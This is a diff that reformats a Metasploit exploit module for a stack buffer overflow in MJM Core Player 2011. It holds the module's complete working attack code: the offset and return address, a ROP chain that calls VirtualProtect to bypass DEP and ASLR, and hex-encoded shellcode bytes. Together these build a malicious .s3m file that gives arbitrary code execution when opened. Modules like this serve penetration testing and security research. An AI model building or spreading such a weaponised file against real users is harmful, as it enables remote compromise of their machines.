@@ -9,52 +9,58 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in MJM Core Player 2011
-        When opening a malicious s3m file in this application, a stack buffer overflow can be
-        triggered, resulting in arbitrary code execution.
-        This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-            'rick2600',      #found the vulnerabilities
-            'corelanc0d3r <peter.ve[at]corelan.be>',  #rop exploit + msf module
+          When opening a malicious s3m file in this application, a stack buffer overflow can be
+          triggered, resulting in arbitrary code execution.
+          This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'rick2600', # found the vulnerabilities
+          'corelanc0d3r <peter.ve[at]corelan.be>', # rop exploit + msf module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'OSVDB', '72101'],
           [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-004' ],
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
         },
-      'Payload'        =>
-        {
-          'Space'       => 2339,  #about 0x900 bytes
+        'Payload' => {
+          'Space' => 2339, # about 0x900 bytes
           'DisableNops' => true
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Windows Universal Generic DEP & ASLR Bypass',
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows Universal Generic DEP & ASLR Bypass',
             {
-              'OffSet' => 819,        #core player.exe
-              'Ret'    => 0x1000156f, #core player.exe
+              'OffSet' => 819, # core player.exe
+              'Ret' => 0x1000156f, # core player.exe
             }
           ],
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2011-04-30',
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2011-04-30',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
-        OptString.new('FILENAME', [ true, 's3m file',  'song.s3m']),
-      ])
+        OptString.new('FILENAME', [ true, 's3m file', 'song.s3m']),
+      ]
+    )
   end
 
   def junk
@@ -62,10 +68,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     print_status("Creating '#{datastore['FILENAME']}' file ...")
 
-    header  = "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x41"
+    header = "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x41"
     header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x10\x00\x00"
     header << "\x24\x00\x00\x01\x00\x0d\x08\x00\x20\x13\x02\x00\x53\x43\x52\x4d"
     header << "\x40\x06\x94\xb0\x10\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -85,8 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     header << "\x01"
 
-
-    footer  = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
+    footer = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
     footer << "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
     footer << "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
     footer << "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
@@ -106,46 +110,44 @@ class MetasploitModule < Msf::Exploit::Remote
 
     pivot = [target.ret].pack('V')
 
-
     rop_gadgets =
-    [
-      # pvefindaddr rop 'n roll
-      0x004c0021,  # POP ECX # RETN
-      0x00000000,
-      0x0042850e,  # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
-      junk,
-      junk,
-      junk,
-      0x00461248,  #  MOV EAX,EDI # POP EDI # POP ESI # RETN
-      junk,
-      junk,
-      junk,
-      junk,
-      junk,
-      0x004ac31d,  # POP EBX # RETN
-      0x00000900,
-      0x004a8032,  # POP ESI # RETN
-      0x00000080,
-      0x10009ea7,  # ADD EAX,ESI # POP ESI # RETN
-      junk,
-      0x004def0d,  # XCHG EAX,EBP # RETN
-      0x004c0145,  # POP EAX # RETN
-      0x005e0ae0,  # VirtualProtect
-      0x00408242,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
-      0x0052001a,  # XCHG EAX,ESI # RETN 00
-      0x004c0729,  # POP EDX # RETN
-      0x00000040,
-      0x004c0021,  # POP ECX # RETN
-      0x00401000,  # RW
-      0x00448142,  # POP EDI # RETN
-      0x004ae7ce,  # RET
-      0x004c0145,  # POP EAX # RETN
-      0x004ae7ce,  # RET
-      0x0052158e,  # PUSHAD # RETN 00
-    ].pack("V*")
+      [
+        # pvefindaddr rop 'n roll
+        0x004c0021,  # POP ECX # RETN
+        0x00000000,
+        0x0042850e,  # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
+        junk,
+        junk,
+        junk,
+        0x00461248,  #  MOV EAX,EDI # POP EDI # POP ESI # RETN
+        junk,
+        junk,
+        junk,
+        junk,
+        junk,
+        0x004ac31d,  # POP EBX # RETN
+        0x00000900,
+        0x004a8032,  # POP ESI # RETN
+        0x00000080,
+        0x10009ea7,  # ADD EAX,ESI # POP ESI # RETN
+        junk,
+        0x004def0d,  # XCHG EAX,EBP # RETN
+        0x004c0145,  # POP EAX # RETN
+        0x005e0ae0,  # VirtualProtect
+        0x00408242,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
+        0x0052001a,  # XCHG EAX,ESI # RETN 00
+        0x004c0729,  # POP EDX # RETN
+        0x00000040,
+        0x004c0021,  # POP ECX # RETN
+        0x00401000,  # RW
+        0x00448142,  # POP EDI # RETN
+        0x004ae7ce,  # RET
+        0x004c0145,  # POP EAX # RETN
+        0x004ae7ce,  # RET
+        0x0052158e,  # PUSHAD # RETN 00
+      ].pack("V*")
 
-
-    buffer  = rand_text(target['OffSet'])
+    buffer = rand_text(target['OffSet'])
     buffer << pivot
     buffer << rop_gadgets
     buffer << make_nops(100)
@@ -156,6 +158,5 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Writing payload to file")
 
     file_create(filecontent)
-
   end
 end
